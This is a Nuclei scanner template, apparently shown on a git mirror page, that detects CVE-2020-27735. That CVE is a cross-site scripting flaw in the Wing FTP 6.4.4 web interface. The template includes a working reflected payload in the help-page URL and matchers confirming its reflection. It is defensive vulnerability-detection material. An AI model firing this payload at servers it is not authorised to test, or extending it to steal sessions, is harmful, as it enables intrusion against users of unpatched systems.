daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2020/CVE-2020-27735.yaml

53 lines
2.0 KiB
YAML
Raw Permalink Blame History

id: CVE-2020-27735
info:
name: Wing FTP 6.4.4 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://www.wftpserver.com/serverhistory.htm
- https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-27735
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-27735
cwe-id: CWE-79
epss-score: 0.00228
epss-percentile: 0.60318
cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wftpserver
product: wing_ftp_server
tags: cve,cve2020,xss,wing-ftp,wftpserver
http:
- method: GET
path:
- "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100a494d928ecfd0bcd8f5ad8d80b1ea8390fed72aca1ab771e8e49b09004d6c4fc022100f5d799e1f6995828b9abf133313b998de24a8ae77af0cf98077f0656f7d36bef:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink